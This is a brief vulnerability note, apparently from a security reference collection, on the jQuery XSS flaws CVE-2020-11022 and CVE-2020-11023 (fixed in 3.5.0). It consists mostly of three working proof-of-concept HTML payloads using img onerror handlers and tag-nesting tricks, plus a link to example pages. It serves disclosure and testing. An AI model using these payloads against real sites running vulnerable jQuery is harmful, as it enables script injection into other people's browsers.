jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022/CVE-2020-11023)¶
此漏洞已在jQuery 3.5.0中修复。
PoC:
PoC 1.
<style><style /><img src=x onerror=alert(1)>
PoC 2. (Only jQuery 3.x affected)
<img alt="<x" title="/><img src=x onerror=alert(1)>">
PoC 3.
<option><style></option></select><img src=x onerror=alert(1)></style>
jQuery XSS Examples:
https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
ref: